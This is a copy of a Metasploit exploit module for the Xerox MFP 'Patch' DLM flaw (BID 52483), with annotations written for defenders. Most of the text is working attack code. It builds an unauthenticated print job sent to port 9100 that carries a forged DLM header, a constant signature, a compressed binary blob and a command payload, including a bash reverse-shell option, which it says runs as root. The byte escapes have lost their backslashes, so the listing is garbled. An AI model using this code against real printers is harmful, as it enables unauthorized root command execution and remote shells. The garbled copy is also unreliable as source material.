
Xerox Multifunction Printers (MFP) "Patch" DLM Vulnerability

2014-11-02 13:40

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

# Metasploit remote exploit module for the Xerox Multifunction Printer (MFP)
# "Patch" Dynamic Loadable Module (DLM) issue (BID 52483, vendor bulletin
# XRX12-003, both listed under 'References' below).
#
# What the code does: it builds a single print job whose header declares the
# job type as a dynamic loadable module, appends a fixed binary blob, and
# writes the whole buffer to a TCP socket (default port 9100, see
# register_options). Per the module's own description, a device that accepts
# such a job runs the embedded command with root privileges.
#
# Notes for defenders, grounded in what this listing sends:
# - Delivery is a plain TCP write to the print port; no login or other
#   authentication step appears anywhere in this module.
# - The header strings are constant across runs, in particular
#   "%%OID_ATT_JOB_TYPE OID_VAL_JOB_TYPE_DYNAMIC_LOADABLE_MODULE" and the
#   job-comment prefix used below, so they are usable as network or
#   print-log indicators on traffic to port 9100.
# - Limiting which hosts may reach the printer's raw print port and applying
#   the remediation in the referenced vendor bulletin are the relevant
#   controls; consult the bulletin for affected models and fixed versions.
#
# NOTE(review): as rendered on this page the byte escapes appear without
# their backslashes ("x0A" rather than an escaped newline), so this listing
# is not byte-accurate. Derive signatures from the upstream source linked in
# the file header, not from this copy.
class Metasploit3 < Msf::Exploit::Remote

# Framework reliability ranking for this module.
Rank = GoodRanking
# Mixes in the framework's TCP client helpers (connect, sock, disconnect).
include Msf::Exploit::Remote::Tcp

# Registers the module metadata (name, description, authors, references,
# payload constraints, platform/arch, targets) and the default remote port.
#
# @param info [Hash] metadata overrides merged in through update_info
def initialize(info = {})
super(update_info(info,
'Name' => 'Xerox Multifunction Printers (MFP) "Patch" DLM Vulnerability',
'Description' => %{
This module exploits a vulnerability found in Xerox Multifunction Printers (MFP). By
supplying a modified Dynamic Loadable Module (DLM), it is possible to execute arbitrary
commands under root priviages.
},
'Author' =>
[
'Deral "Percentx" Heiland',
'Pete "Bokojan" Arzamendi'
],
'References' =>
[
['BID', '52483'],
['URL',
'http://www.xerox.com/download/security/security-bulletin/1284332-2ddc5-4baa79b70ac40/cert_XRX12-003_v1.1.pdf'],
['URL', 'http://foofus.net/goons/percx/Xerox_hack.pdf']
],
'Privileged' => true,
'License' => MSF_LICENSE,
# Payload constraints: command-style payloads only, at most 512 bytes,
# no NOP padding.
'Payload' =>
{
'DisableNops' => true,
'Space' => 512,
'Compat' =>
{
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic bash-tcp'
}
},
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' => [['Automatic', {}]],
'DisclosureDate' => 'Mar 07 2012',
'DefaultTarget' => 0))

# Default destination is TCP 9100; the operator can override RPORT.
register_options(
[
Opt::RPORT(9100)
], self.class)
end

# Builds the DLM print job in memory, sends it in one socket write, then
# hands control to the framework's payload handler. Connection-level errors
# are reported through print_error, and the socket is always closed.
def exploit
print_status("#{rhost}:#{rport} - Sending print job...")
# Job header: a sequence of %%OID_ATT_* attribute lines between %%XRXbegin
# and %%XRXend. Every value is a literal except the encoded payload.
firmcode = '%%XRXbegin' + "x0A"
firmcode << '%%OID_ATT_JOB_TYPE OID_VAL_JOB_TYPE_DYNAMIC_LOADABLE_MODULE' + "x0A"
firmcode << '%%OID_ATT_JOB_SCHEDULING OID_VAL_JOB_SCHEDULING_AFTER_COMPLETE' + "x0A"
# The encoded payload is carried inside a job-comment attribute, delimited
# by colons after a fixed prefix.
firmcode << '%%OID_ATT_JOB_COMMENT "PraedaPWN2014:' + "#{payload.encoded}" + ':"' +
"x0A"
firmcode << '%%OID_ATT_JOB_COMMENT "patch"' + "x0A"
firmcode << '%%OID_ATT_DLM_NAME "xerox"' + "x0A"
firmcode << '%%OID_ATT_DLM_VERSION "NO_DLM_VERSION_CHECK"' + "x0A"
# The signature value is a constant in this file and does not change with
# the payload. NOTE(review): that suggests the device's check is not bound
# to the job content the sender controls; confirm against the vendor bulletin.
firmcode << '%%OID_ATT_DLM_SIGNATURE
"ca361047da56db9dd81fee6a23ff875facc3df0e1153d325c2d217c0e75f861b"' + "x0A"
firmcode << '%%OID_ATT_DLM_EXTRACTION_CRITERIA "extract /tmp/xerox.dnld"' + "x0A"
# Fixed binary body appended after %%XRXend. Its leading bytes (1F 8B 08)
# look like a gzip header; the archive's contents are not shown on this
# page. TODO confirm against upstream.
firmcode << '%%XRXend' + "x0Ax1Fx8Bx08x00xB1x8Bx49x54x00x03xED"
firmcode << "xD3x41x4BxC3x30x14x07xF0x9ExFBx29xFExE2x60x20x74"
firmcode << "x69x63x37x61x5AxBCx79x94xDDx3CxC8xA0x59x9BxDAx4A"
firmcode << "xD7xCCxB4xD3x1DxF6xE1x8DxDDx64xB8x83x3Bx0Dx11xFE"
firmcode << "xBFx43x03xAFx2FxEFxBDxB4x64xA3xADxD9x8CxDAxD2x3B"
firmcode << "xA3xD0xB9x19x8FxFBxD5x39x5ExC3x58x4ExBCx48xC6x52"
firmcode << "x5Ex87xE3x89x8CxBDx30x8AxE4x44x7Ax08xCFx39xD4xB7"
firmcode << "x75xDBx29x0Bx78xD6x98xEExB7xBCx53xEFxFFxA9xCBx0B"
firmcode << "xB1xA8x1AxB1x50x6DxE9x17x55x9DxA4x2Fx56xAFx10xD4"
firmcode << "x08x1Ex30x9Cx59xA5x73x35x7Bx7Ax94x61x14x0Fx21xDE"
firmcode << "x95x15xEDxCAx98x5Ax34x99x68x74x27x5ExCDx62x7Ax35"
firmcode << "x8Ax52xBFx2AxF0x8CxA0xC0xC0xD5xC0xDCxEFx4AxDDxF8"
firmcode << "xC0x47x59xD5x1Ax56xABx1Cx75xD5x68x17xC9x8Dx7Bx00"
firmcode << "x3Ax2Bx0Dx06x5Fx31x6CxB1xEBxF8x06xFCx68xD7xE7xF5"
firmcode << "x65x07xF7x48x12x84x98xDFx62x5Fx17xC8xCCx72xA9x9A"
firmcode << "x3Cx49x0Fx95xB6xD9xBAx43x90x4FxDDx18x32xEDx93x8A"
firmcode << "xAAxEFxE8x9AxDCxF5x83xF9xBBxE4xFDxDExEDxE1xE0x76"
firmcode << "x89x91xD8xECx6Fx82xFBx0CxFEx5FxFFx15x22x22x22x22"
firmcode << "x22x22x22x22x22x22x22x22x22x22x22x22x22xA2xD3x3E"
firmcode << "x01x5Ax18x54xBBx00x28x00x00"

begin
# Open the TCP connection, write the whole job in one call, then let the
# framework handle whatever session the payload produces.
connect
sock.put(firmcode)
handler
rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout,
Rex::AddressInUse => e
# Only connection-level failures are caught; they are reported, not re-raised.
print_error("#{rhost}:#{rport} - #{e.message}")
ensure
# Runs on success and on failure, so the socket is not left open.
disconnect
end
end
end

References:

http://www.xerox.com/download/security/security-bulletin/1284332-2ddc5-4baa79b70ac40/cert_XRX12-003_v1.1.pdf


Source: 1000114102-BLW/eussi/moc.ytirucesxc
